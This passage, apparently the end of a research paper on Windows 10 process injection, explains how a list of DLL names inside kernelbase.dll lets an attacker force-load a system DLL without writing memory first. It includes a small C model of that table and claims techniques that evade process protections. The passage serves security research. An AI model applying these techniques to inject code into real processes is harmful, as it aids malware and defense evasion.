Sometimes, it may be necessary to forcibly load a system DLL into a process, e.g. when a ROP gadget is
needed from such DLL. Generally, an execution method with target LoadLibraryA can be used to load a
DLL, provided the DLL path is in memory. Interestingly, kernelbase.dll contains a list of 1000+ system
DLLs (as NUL-terminated strings). So arbitrary system DLL loading is possible even without prior write
primitive. This list can be found in kernelbase!g_DllMap+8, which is a pointer to an array of structures.
Each structure is 3 QWORDs, the first of which points to a string holding a DLL name (ASCII, NUL-terminated).
The strings populate a consecutive area in the .rdata section, wherein each string is 8-byte
aligned.
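The table layout described above can be modeled in a few lines. This is a hedged sketch over a locally defined array, not code that touches kernelbase.dll: the type and function names (dll_map_entry, find_name) are hypothetical, and the second and third QWORDs are left opaque because the text only describes the first field.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical model of one table entry: three QWORD-sized fields on a 64-bit
   build, of which only the first (a pointer to a NUL-terminated ASCII name)
   is described in the text. */
typedef struct {
    const char *name;   /* field 0: pointer to the DLL name string */
    uint64_t unknown1;  /* field 1: meaning not covered here */
    uint64_t unknown2;  /* field 2: meaning not covered here */
} dll_map_entry;

/* Linear search of the table; returns the address of the stored name string
   that equals `wanted` (case-sensitive), or NULL if no entry matches. */
const char *find_name(const dll_map_entry *table, size_t count, const char *wanted) {
    assert(table != NULL && wanted != NULL);
    for (size_t i = 0; i < count; i++) {
        if (table[i].name != NULL && strcmp(table[i].name, wanted) == 0) {
            return table[i].name;
        }
    }
    return NULL;
}
```

The point of the model is that the lookup yields the address of a name string that already resides in memory, which is what makes the list useful when no write primitive is available.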
Conclusions
This paper fills a major gap in documentation, analysis, update and comparison of true process injection
techniques for Windows 10 x64. Additionally, this paper presents a novel technique for writing data to
memory, and a related technique for execution, both unaffected by all Windows 10 process protection
methods.
All techniques are offered as barebones PoCs and as interchangeable classes in a library which allows
“mix and match” style process injection coding.
Acknowledgements
Kudos to the EnSilo research team, to Odzhan, to Adam of Hexacorn and to Csaba Fitzl AKA TheEvilBit
for their research and innovation over the recent years.